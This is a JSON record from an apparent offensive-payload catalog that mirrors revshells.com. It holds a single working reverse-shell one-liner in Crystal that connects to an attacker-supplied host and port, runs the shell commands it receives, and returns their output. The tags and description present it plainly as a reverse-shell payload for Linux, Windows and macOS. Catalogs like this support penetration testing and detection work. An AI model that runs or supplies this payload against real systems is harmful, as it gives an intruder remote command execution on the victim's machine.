{
  "id": "rsg-reverseshell-crystal-system",
  "name": "RSG · ReverseShell · Crystal (system)",
  "command": "crystal eval 'require \"process\";require \"socket\";c=Socket.tcp(Socket::Family::INET);c.connect(\"<lhost>\",<lport>);loop{m,l=c.receive;p=Process.new(m.rstrip(\"\\n\"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}'",
  "description": "Reverse Shell payload — Crystal (system) (via reverse-shell-generator).",
  "platform": "cross-platform",
  "tags": [
    "rsg",
    "payload",
    "reverse-shell",
    "linux",
    "windows",
    "mac"
  ],
  "source": "rsg",
  "source_url": "https://www.revshells.com/",
  "upstream_id": "ReverseShell/Crystal (system)/72",
  "category": "payloads",
  "subcategory": "reverse-shell",
  "references": [
    {
      "title": "reverse-shell-generator (revshells.com)",
      "url": "https://www.revshells.com/"
    },
    {
      "title": "reverse-shell-generator GitHub",
      "url": "https://github.com/0dayCTF/reverse-shell-generator"
    }
  ]
}
